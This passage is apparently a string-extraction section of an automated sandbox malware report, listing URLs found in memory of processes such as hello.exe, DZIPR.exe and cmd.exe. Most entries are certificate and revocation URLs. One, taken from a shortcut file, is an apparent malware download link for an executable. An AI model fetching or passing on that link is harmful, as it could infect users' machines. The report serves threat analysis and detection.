Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: edb.log.18.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: MdkbG2pK4l.lnk	String found in binary or memory: http://lawyerconsult.top/AUGUST.exe
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://support.datanumen.com
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: DZIPR.exe, 0000000C.00000002.1398577312.000000000353D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.0000000005524000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F1C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.0000000005225000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.000000000514A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.000000000552B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.repairfile.com
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
